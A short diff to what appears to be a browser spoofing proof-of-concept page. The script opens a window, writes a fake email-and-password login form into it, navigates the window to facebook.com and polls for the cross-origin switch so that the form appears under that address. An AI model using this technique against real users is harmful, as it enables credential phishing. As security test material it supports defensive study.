--- a/spoof-slowpage.html
+++ b/spoof-slowpage.html
@@ -5,7 +5,7 @@
 
   function f() {
     w = window.open("");
-    w.document.write(`%3Cinput%20type%3D%22test%22%20value%3D%22test%40gmail.com%22%3E%3Cbr%3E%3Cinput%20type%3D%22text%22%20value%3D%22password%22%3E%3Cbr%3E%3Cbutton%20type%3D%22submit%22%3ESend%3C%2Fbutton%3E`);
+    w.document.write('<input type="test" value="test@gmail.com"><br><input type="text" value="password"><br><button type="submit">Send</button>');
     w.location = "https://facebook.com";
     i = setInterval("try { x = w.location.href; } catch(e) { clearInterval(i); next(); }", 1); 
   }
